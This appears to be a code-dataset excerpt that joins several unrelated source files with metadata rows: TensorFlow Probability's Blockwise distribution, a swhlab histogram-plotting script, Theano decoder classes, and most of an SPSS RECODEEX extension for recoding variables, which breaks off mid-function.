class _Cast(distribution_lib.Distribution):
"""Utility distribution to cast inputs/outputs of another distribution."""
def __init__(self, distribution, dtype):
parameters = dict(locals())
name = 'CastTo{}'.format(dtype_util.name(dtype))
with tf.name_scope(name) as name:
self._distribution = distribution
self._dtype = dtype
super(_Cast, self).__init__(
dtype=dtype,
validate_args=distribution.validate_args,
allow_nan_stats=distribution.allow_nan_stats,
reparameterization_type=distribution.reparameterization_type,
parameters=parameters,
name=name)
def _batch_shape(self):
return self._distribution.batch_shape
def _batch_shape_tensor(self):
return self._distribution.batch_shape_tensor()
def _event_shape(self):
return self._distribution.event_shape
def _event_shape_tensor(self):
return self._distribution.event_shape_tensor()
def _sample_n(self, n, seed=None):
return tf.nest.map_structure(lambda x: tf.cast(x, self._dtype),
self._distribution.sample(n, seed))
def _log_prob(self, x):
x = tf.nest.map_structure(tf.cast, x, self._distribution.dtype)
return tf.cast(self._distribution.log_prob(x), self._dtype)
def _entropy(self):
return self._distribution.entropy()
def _mean(self):
return tf.nest.map_structure(lambda x: tf.cast(x, self._dtype),
self._distribution.mean())
@kullback_leibler.RegisterKL(_Cast, _Cast)
def _kl_blockwise_cast(d0, d1, name=None):
return d0._distribution.kl_divergence(d1._distribution, name=name) # pylint: disable=protected-access
class Blockwise(distribution_lib.Distribution):
"""Blockwise distribution.
This distribution converts a distribution or list of distributions into a
vector-variate distribution by doing a sequence of reshapes and concatenating
the results. This is particularly useful for converting `JointDistribution`
instances to vector-variate for downstream uses which can only handle
single-`Tensor` distributions.
#### Examples
Flattening a sequence of distrbutions:
```python
tfd = tfp.distributions
d = tfd.Blockwise(
[
tfd.Independent(
tfd.Normal(
loc=tf.zeros(4, dtype=tf.float64),
scale=1),
reinterpreted_batch_ndims=1),
tfd.MultivariateNormalTriL(
scale_tril=tf.eye(2, dtype=tf.float32)),
],
dtype_override=tf.float32,
)
x = d.sample([2, 1])
y = d.log_prob(x)
x.shape # ==> (2, 1, 4 + 2)
x.dtype # ==> tf.float32
y.shape # ==> (2, 1)
y.dtype # ==> tf.float32
d.mean() # ==> np.zeros((4 + 2,))
```
Flattening a joint distribution:
```python
tfd = tfp.distributions
Root = tfd.JointDistributionCoroutine.Root # Convenient alias.
def model():
e = yield Root(tfd.Independent(tfd.Exponential(rate=[100, 120]), 1))
g = yield tfd.Gamma(concentration=e[..., 0], rate=e[..., 1])
n = yield Root(tfd.Normal(loc=0, scale=2.))
yield tfd.Normal(loc=n, scale=g)
joint = tfd.JointDistributionCoroutine(model)
d = tfd.Blockwise(joint)
x = d.sample([2, 1])
y = d.log_prob(x)
x.shape # ==> (2, 1, 2 + 1 + 1 + 1)
x.dtype # ==> tf.float32
y.shape # ==> (2, 1)
y.dtype # ==> tf.float32
```
"""
def __init__(self,
distributions,
dtype_override=None,
validate_args=False,
allow_nan_stats=False,
name='Blockwise'):
"""Construct the `Blockwise` distribution.
Args:
distributions: Python `list` of `tfp.distributions.Distribution`
instances. All distribution instances must have the same `batch_shape`
and all must have `event_ndims==1`, i.e., be vector-variate
distributions.
dtype_override: samples of `distributions` will be cast to this `dtype`.
If unspecified, all `distributions` must have the same `dtype`.
Default value: `None` (i.e., do not cast).
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or more
of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with tf.name_scope(name) as name:
self._distributions = distributions
if dtype_override is not None:
distributions = tf.nest.map_structure(
lambda d: _Cast(d, dtype_override), distributions)
if _is_iterable(distributions):
self._distribution = (
joint_distribution_sequential.JointDistributionSequential(
list(distributions)))
else:
self._distribution = distributions
# Need to cache these for JointDistributions as the batch shape of that
# distribution can change after `_sample` calls.
self._cached_batch_shape_tensor = self._distribution.batch_shape_tensor()
self._cached_batch_shape = self._distribution.batch_shape
if dtype_override is not None:
dtype = dtype_override
else:
dtype = set(
dtype_util.base_dtype(dtype)
for dtype in tf.nest.flatten(self._distribution.dtype)
if dtype is not None)
if len(dtype) == 0: # pylint: disable=g-explicit-length-test
dtype = tf.float32
elif len(dtype) == 1:
dtype = dtype.pop()
else:
raise TypeError(
'Distributions must have same dtype; found: {}.'.format(
self._distribution.dtype))
reparameterization_type = set(
tf.nest.flatten(self._distribution.reparameterization_type))
reparameterization_type = (
reparameterization_type.pop() if len(reparameterization_type) == 1
else reparameterization.NOT_REPARAMETERIZED)
super(Blockwise, self).__init__(
dtype=dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
reparameterization_type=reparameterization_type,
parameters=parameters,
name=name)
@property
def distributions(self):
return self._distributions
@property
def experimental_is_sharded(self):
any_is_sharded = any(
d.experimental_is_sharded for d in self.distributions)
all_are_sharded = all(
d.experimental_is_sharded for d in self.distributions)
if any_is_sharded and not all_are_sharded:
raise ValueError('`Blockwise.distributions` sharding must match.')
return all_are_sharded
@classmethod
def _parameter_properties(cls, dtype, num_classes=None):
return dict(
distributions=parameter_properties.BatchedComponentProperties(
event_ndims=(
lambda self: [0 for _ in self.distributions])))
def _batch_shape(self):
return functools.reduce(tensorshape_util.merge_with,
tf.nest.flatten(self._cached_batch_shape),
tf.TensorShape(None))
def _batch_shape_tensor(self):
# We could get partial static-ness by swapping in values from
# `self.batch_shape`, however this would require multiple graph ops.
return tf.nest.flatten(self._cached_batch_shape_tensor)[0]
def _event_shape(self):
event_sizes = tf.nest.map_structure(tensorshape_util.num_elements,
self._distribution.event_shape)
if any(r is None for r in tf.nest.flatten(event_sizes)):
return tf.TensorShape([None])
return tf.TensorShape([sum(tf.nest.flatten(event_sizes))])
def _event_shape_tensor(self):
event_sizes = tf.nest.map_structure(tensorshape_util.num_elements,
self._distribution.event_shape)
if any(s is None for s in tf.nest.flatten(event_sizes)):
event_sizes = tf.nest.map_structure(
lambda static_size, shape_tensor: # pylint: disable=g-long-lambda
(tf.reduce_prod(shape_tensor)
if static_size is None else static_size),
event_sizes,
self._distribution.event_shape_tensor())
return tf.reduce_sum(tf.nest.flatten(event_sizes))[tf.newaxis]
def _flatten_and_concat_event(self, x):
def _reshape_part(part, event_shape):
part = tf.cast(part, self.dtype)
static_rank = tf.get_static_value(ps.rank_from_shape(event_shape))
if static_rank == 1:
return part
new_shape = ps.concat([
ps.shape(part)[:ps.size(ps.shape(part)) - ps.size(event_shape)], [-1]
],
axis=-1)
return tf.reshape(part, ps.cast(new_shape, tf.int32))
if all(
tensorshape_util.is_fully_defined(s)
for s in tf.nest.flatten(self._distribution.event_shape)):
x = tf.nest.map_structure(_reshape_part, x,
self._distribution.event_shape)
else:
x = tf.nest.map_structure(_reshape_part, x,
self._distribution.event_shape_tensor())
return tf.concat(tf.nest.flatten(x), axis=-1)
def _split_and_reshape_event(self, x):
event_tensors = self._distribution.event_shape_tensor()
splits = [
ps.maximum(1, ps.reduce_prod(s))
for s in tf.nest.flatten(event_tensors)
]
x = tf.nest.pack_sequence_as(event_tensors, tf.split(x, splits, axis=-1))
def _reshape_part(part, dtype, event_shape):
part = tf.cast(part, dtype)
static_rank = tf.get_static_value(ps.rank_from_shape(event_shape))
if static_rank == 1:
return part
new_shape = ps.concat([ps.shape(part)[:-1], event_shape], axis=-1)
return tf.reshape(part, ps.cast(new_shape, tf.int32))
if all(
tensorshape_util.is_fully_defined(s)
for s in tf.nest.flatten(self._distribution.event_shape)):
x = tf.nest.map_structure(_reshape_part, x, self._distribution.dtype,
self._distribution.event_shape)
else:
x = tf.nest.map_structure(_reshape_part, x, self._distribution.dtype,
self._distribution.event_shape_tensor())
return x
def _sample_n(self, n, seed=None):
return self._flatten_and_concat_event(
self._distribution.sample(n, seed=seed))
def _sample_and_log_prob(self, sample_shape, seed):
x, lp = self._distribution.experimental_sample_and_log_prob(
sample_shape, seed=seed)
return self._flatten_and_concat_event(x), lp
def _log_prob(self, x):
return self._distribution.log_prob(self._split_and_reshape_event(x))
def _entropy(self):
return self._distribution.entropy()
def _prob(self, x):
return self._distribution.prob(self._split_and_reshape_event(x))
def _mean(self):
return self._flatten_and_concat_event(self._distribution.mean())
def _default_event_space_bijector(self):
return self._distribution.experimental_default_event_space_bijector()
def _parameter_control_dependencies(self, is_init):
assertions = []
message = 'Distributions must have the same `batch_shape`'
if is_init:
batch_shapes = tf.nest.flatten(self._cached_batch_shape)
if all(tensorshape_util.is_fully_defined(b) for b in batch_shapes):
if batch_shapes[1:] != batch_shapes[:-1]:
raise ValueError('{}; found: {}.'.format(message, batch_shapes))
if not self.validate_args:
assert not assertions # Should never happen.
return []
if self.validate_args:
batch_shapes = self._cached_batch_shape
if not all(
tensorshape_util.is_fully_defined(s)
for s in tf.nest.flatten(batch_shapes)):
batch_shapes = tf.nest.map_structure(
lambda static_shape, shape_tensor: # pylint: disable=g-long-lambda
(static_shape if tensorshape_util.is_fully_defined(static_shape)
else shape_tensor), batch_shapes, self._cached_batch_shape_tensor)
batch_shapes = tf.nest.flatten(batch_shapes)
assertions.extend(
assert_util.assert_equal( # pylint: disable=g-complex-comprehension
b1,
b2,
message='{}.'.format(message))
for b1, b2 in zip(batch_shapes[1:], batch_shapes[:-1]))
assertions.extend(
assert_util.assert_equal( # pylint: disable=g-complex-comprehension
tf.size(b1),
tf.size(b2),
message='{}.'.format(message))
for b1, b2 in zip(batch_shapes[1:], batch_shapes[:-1]))
return assertions
def _sample_control_dependencies(self, x):
assertions = []
message = 'Input must have at least one dimension.'
if tensorshape_util.rank(x.shape) is not None:
if tensorshape_util.rank(x.shape) == 0:
raise ValueError(message)
elif self.validate_args:
assertions.append(assert_util.assert_rank_at_least(x, 1, message=message))
return assertions
@kullback_leibler.RegisterKL(Blockwise, Blockwise)
def _kl_blockwise_blockwise(b0, b1, name=None):
"""Calculate the batched KL divergence KL(b0 || b1) with b0 and b1 Blockwise distributions.
Args:
b0: instance of a Blockwise distribution object.
b1: instance of a Blockwise distribution object.
name: (optional) Name to use for created operations. Default is
"kl_blockwise_blockwise".
Returns:
kl_blockwise_blockwise: `Tensor`. The batchwise KL(b0 || b1).
"""
return b0._distribution.kl_divergence(b1._distribution, name=name) # pylint: disable=protected-access
| apache-2.0 | 4,754,112,428,471,258,000 | 36.071429 | 104 | 0.648105 | false | 3.80964 | false | false | false |
swharden/SWHLab | doc/uses/EPSCs-and-IPSCs/smooth histogram method/05.py | 1 | 1812 | """
MOST OF THIS CODE IS NOT USED
ITS COPY/PASTED AND LEFT HERE FOR CONVENIENCE
"""
import os
import sys
# in case our module isn't installed (running from this folder)
if not os.path.abspath('../../../') in sys.path:
sys.path.append('../../../') # helps spyder get docs
import swhlab
import swhlab.common as cm
import matplotlib.pyplot as plt
import numpy as np
import warnings # suppress VisibleDeprecationWarning warning
warnings.filterwarnings("ignore", category=np.VisibleDeprecationWarning)
def analyzeSweep(abf,plotToo=True,color=None,label=None):
Y=abf.sweepYsmartbase()[abf.pointsPerSec*.5:]
AV,SD=np.average(Y),np.std(Y)
dev=5 # number of stdevs from the avg to set the range
R1,R2=[(AV-SD)*dev,(AV+SD)*dev]
nBins=1000
hist,bins=np.histogram(Y,bins=nBins,range=[R1,R2],density=True)
histSmooth=abf.convolve(hist,cm.kernel_gaussian(nBins/5))
if plotToo:
plt.plot(bins[1:],hist,'.',color=color,alpha=.2,ms=10)
plt.plot(bins[1:],histSmooth,'-',color=color,lw=5,alpha=.5,label=label)
return
if __name__=="__main__":
#abfFile=R"C:\Users\scott\Documents\important\demodata\abfs\16d07022.abf"
abfFile=R"X:\Data\2P01\2016\2016-09-01 PIR TGOT\16d07022.abf"
abf=swhlab.ABF(abfFile)
# prepare figure
plt.figure(figsize=(10,10))
plt.grid()
plt.title("smart baseline value distribution")
plt.xlabel(abf.units2)
plt.ylabel("normalized density")
# do the analysis
abf.kernel=abf.kernel_gaussian(sizeMS=500)
abf.setsweep(175)
analyzeSweep(abf,color='b',label="baseline")
abf.setsweep(200)
analyzeSweep(abf,color='g',label="TGOT")
abf.setsweep(375)
analyzeSweep(abf,color='y',label="washout")
# show figure
plt.legend()
plt.margins(0,.1)
plt.show()
print("DONE")
| mit | -1,441,784,876,486,513,400 | 28.225806 | 79 | 0.683223 | false | 2.936791 | false | false | false |
enalisnick/stick-breaking_dgms | models/variational_coders/decoders.py | 1 | 3064 | import numpy as np
import theano
import theano.tensor as T
### Regular Decoder
class Decoder(object):
def __init__(self, rng, input, latent_size, out_size, activation, W_z = None, b = None):
self.input = input
self.activation = activation
# setup the params
if W_z is None:
W_values = np.asarray(0.01 * rng.standard_normal(size=(latent_size, out_size)), dtype=theano.config.floatX)
W_z = theano.shared(value=W_values, name='W_hid_z')
if b is None:
b_values = np.zeros((out_size,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b')
self.W_z = W_z
self.b = b
self.pre_act_out = T.dot(self.input, self.W_z) + self.b
self.output = self.activation(self.pre_act_out)
# gather parameters
self.params = [self.W_z, self.b]
### Supervised Decoder
class Supervised_Decoder(Decoder):
def __init__(self, rng, input, labels, latent_size, label_size, out_size, activation, W_z = None, W_y = None, b = None):
self.labels = labels
# init parent class
super(Supervised_Decoder, self).__init__(rng=rng, input=input, latent_size=latent_size, out_size=out_size, activation=activation, W_z=W_z, b=b)
# setup the params
if W_y is None:
W_values = np.asarray(0.01 * rng.standard_normal(size=(label_size, out_size)), dtype=theano.config.floatX)
W_y = theano.shared(value=W_values, name='W_y')
self.W_y = W_y
self.output = self.activation( self.pre_act_out + T.dot(self.labels, self.W_y) )
# gather parameters
self.params += [self.W_y]
### Marginalized Decoder (for semi-supervised model)
class Marginalized_Decoder(Decoder):
def __init__(self, rng, input, batch_size, latent_size, label_size, out_size, activation, W_z, W_y, b):
# init parent class
super(Marginalized_Decoder, self).__init__(rng=rng, input=input, latent_size=latent_size, out_size=out_size, activation=activation, W_z=W_z, b=b)
# setup the params
self.W_y = W_y
# compute marginalized outputs
labels_tensor = T.extra_ops.repeat( T.shape_padaxis(T.eye(n=label_size, m=label_size), axis=0), repeats=batch_size, axis=0)
self.output = self.activation(T.extra_ops.repeat(T.shape_padaxis(T.dot(self.input, self.W_z), axis=1), repeats=label_size, axis=1) + T.dot(labels_tensor, self.W_y) + self.b)
# no params here since we'll grab them from the supervised decoder
| mit | 8,828,024,413,954,331,000 | 49.229508 | 181 | 0.520235 | false | 3.718447 | false | false | false |
IBMPredictiveAnalytics/SPSSINC_RECODEEX | src/SPSSINC_RECODEEX.py | 1 | 20980 |
#/***********************************************************************
# * Licensed Materials - Property of IBM
# *
# * IBM SPSS Products: Statistics Common
# *
# * (C) Copyright IBM Corp. 1989, 2020
# *
# * US Government Users Restricted Rights - Use, duplication or disclosure
# * restricted by GSA ADP Schedule Contract with IBM Corp.
# ************************************************************************/
import spss, spssaux
from spssaux import _smartquote
from spssaux import u
import spss, spssaux
from extension import Template, Syntax, processcmd
import locale, os, re, copy, codecs, string
__author__ = 'spss, JKP'
__version__= '1.1.0'
# history
# 04-jun-2010 original version
# 11-nov-2014 Allow input value labels in generated value labels
helptext = """SPSSINC RECODEEX
inputvarlist = outputvarlist
/RECODES "(input value(s) = recode) ... (else={COPY*|SYSMIS})"
[/OPTIONS [STRINGSIZE=n] [VALUELABELS={YES*|NO}] [COPYVARIABLELABELS={YES*|NO}]
[SUFFIX="value"] [PREFIX="value"]]
Recode variables into other variables with optional variable and value label generation.
Examples:
RECODEEX fatherage motherage = fatheragerc motheragerc
/RECODES "(LO THRU 50=1) (51 thru 75=2) (ELSE=COPY)"
/OPTIONS SUFFIX="rc".
RECODEEX bdate = bdaterc
/RECODES "(LO THRU 1950-12-31=1)(1951-01-01 THRU 1990-12-31=2)".
RECODE duration = durationrc
/RECODES "(LO THRU 10 12:00:00=1)(10 12:00:00 THRU HIGH=2)".
This command extends the built-in RECODE command in several ways.
- Date or time constants are used for variables of these types
- Value labels can be automatically generated for the outputs
- Variable labels can be copied
- Variable types can be changed for the output variables.
inputvarlist specifies the variables to be recoded. They must all have the same type
(numeric, string, a date format, or a time format).
MOYR, WKYR and WKDAY formats are not supported.
outputvarlist specifies an equal number of variables for the results. If STRINGSIZE is specified,
the output variables will all be made strings of that length. The type of any existing variables will be
changed to match if necessary. If STRINGSIZE is not specified, no variable types
will be changed, and any new variables will be numeric.
A variable cannot be used as both an input and output variable.
Recode specifications have the same general form as for the RECODE command:
(input-values = output-value)
See the RECODE command for details.
THE ENTIRE RECODE SPECIFICATION must be enclosed in quotes.
Input or output string values must also be quoted.
If the variables have a date format, recode values have the form yyyy-mm-dd.
If the values have a time format, recode values have the form hh:mm, hh:mm:ss.ss
or these forms preceded by days, e.g., 10 08:03.
VALUELABELS specifies whether value labels should be created for the output values.
They will consist of the input values that are mapped to each output with two caveats:
An else specification does not contribute to the labels.
If an input value is mapped to more than one output value, it will appear in each corresponding
value label even though the RECODE command processes from left to right.
If COPYVARIABLELABELS=YES, the variable label, if any, of each input variable
will be copied to the output variable. PREFIX and SUFFIX can specify text to be
prepended or appended to the label with a separating blank.
/HELP displays this help and does nothing else.
"""
# MOYR, WKYR and WKDAY formats are not supported
datefmts = set(["DATE", "ADATE", "EDATE", "JDATE", "SDATE", "QYR", "DATETIME"])
timefmts = set(["TIME", "DTIME"])
numfmts = set(["F", "N", "E"])
strfmts = set(["A", "AHEX"])
def Run(args):
"""Execute the SPSSINC RECODEEX extension command"""
# debugging
# makes debug apply only to the current thread
#try:
#import wingdbstub
#if wingdbstub.debugger != None:
#import time
#wingdbstub.debugger.StopDebug()
#time.sleep(2)
#wingdbstub.debugger.StartDebug()
#import thread
#wingdbstub.debugger.SetDebugThreads({thread.get_ident(): 1}, default_policy=0)
#except:
#pass
args = args[list(args.keys())[0]]
oobj = Syntax([
Template("", subc="", ktype="literal", var="varlist", islist=True),
Template("", subc="RECODES", ktype="literal", var="recodes", islist=True),
Template("STRINGSIZE", subc="OPTIONS", ktype="int", var="stringsize", vallist=[1, 32767]),
Template("VALUELABELS", subc="OPTIONS", ktype="bool", var="makevaluelabels"),
Template("USEINPUTVALLABELS", subc="OPTIONS", ktype="bool",
var="useinputvallabels"),
Template("COPYVARIABLELABELS", subc="OPTIONS", ktype="bool", var="copyvariablelabels"),
Template("SUFFIX", subc="OPTIONS", ktype="literal", var="suffix"),
Template("PREFIX", subc="OPTIONS", ktype="literal", var="prefix"),
Template("HELP", subc="", ktype="bool")])
#enable localization
global _
try:
_("---")
except:
def _(msg):
return msg
# A HELP subcommand overrides all else
if "HELP" in args:
#print helptext
helper()
else:
processcmd(oobj, args, recode)
def helper():
"""open html help in default browser window
The location is computed from the current module name"""
import webbrowser, os.path
path = os.path.splitext(__file__)[0]
helpspec = "file://" + path + os.path.sep + \
"markdown.html"
# webbrowser.open seems not to work well
browser = webbrowser.get()
if not browser.open_new(helpspec):
print(("Help file not found:" + helpspec))
try: #override
from extension import helper
except:
pass
def recode(varlist, recodes, stringsize=None, makevaluelabels=True, copyvariablelabels=True, useinputvallabels=False,
suffix="", prefix=""):
vardict = spssaux.VariableDict(caseless=True)
isutf8 = spss.PyInvokeSpss.IsUTF8mode()
ecutf8 = codecs.getencoder("utf_8")
inputlist, outputlist, vartype = parsevarlist(varlist, vardict)
if len(recodes) > 1:
raise ValueError(_("The RECODES subcommand must consist of a single, quoted specification"))
# recodespec is a list of textual recode syntax, one item per value set
# vldefs is a dictionary with keys the target values
# and values the input codes
# inputdict is a dictionary with keys the target values
# and values a list of the input codes
recodespec, vldefs, inputdict = parserecodes(recodes[0], vartype, stringsize)
valuelabelmessage = checklabelconsistency(inputlist, vardict)
if stringsize:
alter = []
create = []
for v in outputlist:
try:
if vardict[v].VariableType != stringsize:
alter.append(v)
except:
create.append(v)
if create:
spss.Submit("STRING %s (A%s)." % (" ".join(create), stringsize))
if alter:
spss.Submit("ALTER TYPE %s (A%s)" % (" ".join(alter), stringsize))
spss.Submit("""RECODE %s %s INTO %s.""" % (" ".join(inputlist), " ".join(recodespec), " ".join(outputlist)))
# generate variable labels if requested
if copyvariablelabels:
if prefix and not prefix.endswith(" "):
prefix = prefix + " "
if suffix and not suffix.startswith(" "):
suffix = " " + suffix
for vin, vout in zip(inputlist, outputlist):
spss.Submit("""VARIABLE LABEL %s %s.""" % \
(vout, _smartquote(prefix + vardict[vin].VariableLabel + suffix, True)))
# generate value labels if requested
# all values for given target are merged but else clause is omitted
# VALUE LABELS syntax quotes values regardless of variable type
# vldefs is a dictionary with keys of the output values and
# values a string listing the input values. If copying value labels
# the first input variable is used as the source.
if makevaluelabels:
if useinputvallabels:
vldefs = makevallabels(vldefs, inputdict,
vardict[inputlist[0]].ValueLabels, isutf8, ecutf8)
# ensure that copy as target does not generate a value label
copyset = set()
for target in vldefs:
if target.lower() == "copy":
copyset.add(target)
for c in copyset:
del(vldefs[c])
#spss.Submit(r"""VALUE LABELS %s %s.""" % (" ".join(outputlist), \
#" ".join([_smartquote(val, vartype == 2) + " " + _smartquote(label, True) for val, label in vldefs.items()])))
spss.Submit(r"""VALUE LABELS %s %s.""" % (" ".join(outputlist), \
" ".join([val + " " + _smartquote(label, True) for val, label in list(vldefs.items())])))
if valuelabelmessage:
print(valuelabelmessage)
def makevallabels(vldefs, inputlabels, valuelabels,
isutf8, ecutf8):
"""convert values to value labels where available up to length limit
vldefs is a list of target values
value is string listing input values
valuelabels is a dictionary of labels
inputlabels is a dictionary of input values to the recode
The input values are a list preceded by the join sequence
"""
for target in vldefs:
labels = [valuelabels.get(val, val) for val in inputlabels[target]]
labels = ", ".join(labels)
vldefs[target] = (truncatestring(labels, isutf8, 120, ecutf8))
return vldefs
def truncatestring(name, unicodemode, maxlength, ecutf8):
"""Return a name truncated to no more than maxlength BYTES.
name is the candidate string
unicodemode identifies whether in Unicode mode or not
maxlength is the maximum byte count allowed. It must be a positive integer
ecutf8 is a utf-8 codec
If name is a (code page) string, truncation is straightforward. If it is Unicode utf-8,
the utf-8 byte representation must be used to figure this out but still truncate on a character
boundary."""
if not unicodemode:
if len(name) > maxlength:
name = name[:maxlength-3] + "..."
else:
newname = []
nnlen = 0
# In Unicode mode, length must be calculated in terms of utf-8 bytes
for c in name:
c8 = ecutf8(c)[0] # one character in utf-8
nnlen += len(c8)
if nnlen <= maxlength:
newname.append(c)
else:
newname = newname[:-4]
newname.append("...")
break
name = "".join(newname)
return name
def parsevarlist(varlist, vardict):
"""return input variable list, output variable list, and basic type
varlist is a list whose combined elements have the "var var var = var var var"
vardict is a variable dictionary
In return, type is coded as
1 = numeric
2 = string
3 = date
4 = time
type constraints are enforced here but no attempt is made to check output variable types"""
try:
sepindex = varlist.index("=")
inputv = varlist[:sepindex]
outputv = varlist[sepindex+1:]
except:
raise ValueError(_("Variable list must have the form inputvars = outputvars"))
if len(inputv) != len(outputv):
raise ValueError(_("The number of input and output variables differ"))
if set(inputv).intersection(set(outputv)):
raise ValueError(_("Input and Output variable lists must be distinct"))
fmts = [vardict[v].VariableFormat.rstrip("0123456789.") for v in inputv]
fmtypes = [f in numfmts and 1 or f in strfmts and 2 or f in datefmts and 3\
or f in timefmts and 4 for f in fmts or 0]
if len(set(fmtypes)) > 1:
raise ValueError(_("All input variables must have the same basic type"))
if fmtypes[0] == 0:
raise ValueError(_("Unsupported format type: %s") % fmts[0])
return inputv, outputv, fmtypes[0]
def parserecodes(recodes, vartype, stringsize):
"""Return list of recode specs for values
recodes is the text of the RECODES subcommand. Expected form is
(input values = outputvalue) ...
where input values could be a list of values, including THRU , HIGH, HIGHEST etc
For dates, expected form is yyyy-mm-dd
For times, expected form is hh:mm:ss.fraction where all parts after hh are optional
Else spec is returned as is (RECODE will check it)
vartype is 1 - 4 as above"""
# first, process out all ( and ) characters embedded inside a literal (only matters for string variables)
recodes = protected(recodes)
allmappings = re.findall(r"\(.+?\)", recodes) # find all parenthesized mappings
if not allmappings:
raise ValueError(_("The recode specification did not include any parenthesized specifications."))
recodespec = []
recodetargets = {}
inputlist = {}
for item in allmappings:
itemcopy = copy.copy(item)
if vartype == 3:
item, count = re.subn(r"\d+-\d+-\d+(\s+\d+:\d+(:[.0-9]+)*)*", yrmodamo, item) # convert date or date/time expressions
if count == 0:
raise ValueError(_("A date variable recode specification did not include a date value: %s") % item)
elif vartype == 2:
item = re.sub(r"\02", "(", item)
item = re.sub(r"\03", ")", item)
itemcopy = copy.copy(item)
elif vartype == 4:
item, count = re.subn(r"(\d+\s+)*\d+:\d+(:[0-9.]+)*", timemo, item)
if count == 0:
raise ValueError(_("A time variable recode specification did not include a time value: %s") % item)
recodespec.append(item)
parts = mapdef(itemcopy) # get input, target for recode target value
if not parts[0] == "else":
try:
recodetargets[parts[1]] = recodetargets[parts[1]] + "," + parts[0]
except: # new target value
recodetargets[parts[1]] = parts[0]
inputlist[parts[1]] = splitter(parts[0])
return recodespec, recodetargets, inputlist
# characters legal in recode spec keywords
# string.letters is affected by local setting so need to subset
letters = string.ascii_letters[:52]
def splitter(pplus):
"""split string according to SPSS Statistics rules and return as list
pplus is the string to split
If the recode spec contains RECODE keywords,
return the expression as a list of length 1"""
quo = None
pplus = list(pplus +" ")
i = 0
pplusout = []
recodekeyword = False
while i < len(pplus) -1:
ch = pplus[i]
if ch == quo:
if pplus[i+1] == quo:
i+=1
pplusout.append(ch)
else:
quo = None
else:
if ch in ['"', "'"]:
quo = ch
else:
pplusout.append(ch)
if quo and ch == " ":
#pplus[i] = "\a"
pplusout[-1] = "\a"
if not quo and ch in letters: # plain alphabetics
recodekeyword = True
i += 1
inputs = "".join(pplusout).split()
inputs = [item.replace("\a", " ") for item in inputs]
if recodekeyword:
inputs = [" ".join(inputs)] # Can't find a label for this
return inputs
def checklabelconsistency(varnames, vardict):
"""Print warning message if value labels for varnames are inconsistent
varnames is a list of variable names to check
vardict is a VariableDict object"""
if len(varnames) <= 1:
return
clashes = []
for i,var in enumerate(varnames):
vallabels = set([(k.lower(), v) for k, v in list(vardict[var].ValueLabels.items())])
if i == 0:
refset = copy.copy(vallabels)
else:
if refset and not vallabels.issubset(refset):
clashes.append(var)
if clashes:
return _("""Warning: The following variables have value labels sets inconsistent with the
first variable being recoded (%s). The coding may be inconsistent.
If generating labels from the input value labels, the labels from
the first input variable are used to label the output values
for all the output variables.
%s""") % (varnames[0], " ".join(clashes))
else:
return None
def mapdef(spec):
"""return target value and inputs as a duple
spec has form (inputs = target)"""
# can't simply look for = not surrounded by quotes because ('x'='y') is legit :-(
litranges = []
for ch in ["'", '"']: #single quote or double quote
pat = """%(ch)s[^%(ch)s]*%(ch)s""" % locals() # quote non-quote-of-same-type* quote
moit = re.finditer(pat, spec)
# for each literal found, replace ( and )
for m in moit:
litranges.append(m.span())
for i in range(len(spec), 0, -1):
pos = i-1
if spec[pos] == "=":
inlit = False
for r in litranges:
if r[0] <= pos < r[1]:
inlit = True
break
if inlit:
continue
return (spec[1:pos].strip(), spec[pos+1:-1].strip())
else:
raise ValueError(_("Invalid recode specification: %s") % spec)
# break expression into input and target separated by unquoted =
###return (parts[0][1:].strip(), parts[1][:-1].strip())
def protected(astr):
"""Return a string where all ( or ) characters embedded in quotes are converted to x02 or x03
astr is the text to search"""
# astr will always be pretty short in practice
for ch in ["'", '"']: #single quote or double quote
pat = """%(ch)s[^%(ch)s]*%(ch)s""" % locals() # quote non-quote-of-same-type* quote
moit = re.finditer(pat, astr)
# for each literal found, replace ( and )
for m in moit:
st, end = m.start(), m.end()
astr = astr[:st] + re.sub(r"\(", "\x02", astr[st:end]) + astr[end:]
astr = astr[:st] + re.sub(r"\)", "\x03", astr[st:end]) + astr[end:]
return astr
def yrmodamo(mo):
"""convert a date expression with an optional time portion to a number for recode
mo is the match object"""
# input like
#2005-03-31 or
#2005-03-31 8:30 or
#2005-03-31 8:30:05.2
parts = mo.group().split() # break up date and time portions on white space
date = parts[0].split("-")
timeseconds = 0.
dateval = yrmoda(date)
# time portion, if any. hours and minutes are required; seconds are optional.
if len(parts) ==2:
timeparts = parts[1].split(":") # either 2 or 3 parts
timeparts = [float(t) for t in timeparts]
timeseconds = (timeparts[0] * 60. + timeparts(1)) * 60.
if len(timeparts) == 3:
timeseconds = timeseconds + timeparts[2]
return str(dateval + timeseconds)
def timemo(mo):
"""convert a time expression to a number for recode
mo is the match object"""
# input like
#d hh:mm
#d hh:mm:ss.ss
#hh:mm
#hh:mm:ss.ss
parts = mo.group().split() # days and time
# time portion
t = [float(v) for v in parts[-1].split(":")]
t0 = (t[0] * 60. + t[1]) * 60. # hours and minutes
if len(t) == 3:
t0 = t0 + t[2] # and seconds
if len(parts) == 2: # day portion?
t0 = t0 + float(parts[0]) * 86400.
return str(t0)
def _smartquote(s, quoteit=True, qchar='"'):
""" smartquote a string so that internal quotes are distinguished from surrounding
quotes for SPSS and return that string with the surrounding quotes. qchar is the
character to use for surrounding quotes.
if quoteit is True, s is a string that needs quoting; otherwise it does not
"""
if quoteit:
return qchar + s.replace(qchar, qchar+qchar) + qchar
else:
return s
def yrmoda(ymd):
"""compute SPSS internal date value from four digit year, month, and day.
ymd is a list of numbers in that order. The parts will be truncated to integers.
The result is equivalent to the SPSS subroutine yrmoda result converted to seconds"""
if len(ymd) != 3:
raise ValueError("date specification must have the form yyyy-mm-dd")
year = int(ymd[0])
month = int(ymd[1])
day = int(ymd[2])
if year < 1582 or month < 1 or month > 13 or day <0 or day > 31:
raise ValueError((_("Invalid date value: %d %d %d")) % (year, month, day))
yrmo = year * 365 + (year+3)//4 - (year+99)//100 + (year + 399)//400 \
+ 3055 *(month+2)//100 - 578192
if month > 2:
yrmo-= 2
if (year%4 == 0 and (year%100 != 0 or year%400 ==0)):
